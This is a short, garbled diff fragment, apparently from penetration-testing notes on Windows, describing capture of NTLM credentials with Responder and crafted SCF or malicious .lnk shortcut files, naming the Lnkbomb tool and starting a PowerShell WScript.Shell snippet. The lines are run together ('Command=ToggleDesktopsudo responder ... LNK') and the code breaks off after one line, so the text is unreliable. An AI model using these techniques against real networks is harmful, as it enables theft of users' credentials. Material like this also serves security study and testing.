Windows

 [Taskbar]

-sudo responder -I <INTERFACE>
+Command=ToggleDesktopsudo responder -I <INTERFACE>LNK

-We can get the same effect as SCF
+We can get the same effect as SCF using a malicious .lnk file.

-We can use various tools to generate a malicious .lnk
+We can use various tools to generate a malicious .lnk file, such as Lnkbomb, or we can run this code.

 $objShell = New-Object -ComObject WScript.Shell